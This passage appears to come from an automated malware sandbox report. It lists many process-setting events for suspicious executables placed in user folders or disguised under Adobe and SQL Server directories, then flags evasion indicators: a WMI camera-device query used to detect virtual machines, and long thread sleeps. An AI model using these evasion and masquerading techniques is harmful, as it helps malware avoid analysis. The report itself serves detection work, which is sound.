      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
      Source: C:\Users\user\Desktop\w9d568i4Ia.exe TID: 768Thread sleep count: 3299 > 30Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3599839s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3598500s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3598187s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3597891s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3597623s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3597250s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3596937s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3596775s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3596606s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3596497s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3596343s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3596000s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3595842s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3595594s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3595391s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3595187s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3595045s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3594796s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3594641s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3594500s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3594336s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3594187s >= -30000sJump to behavior
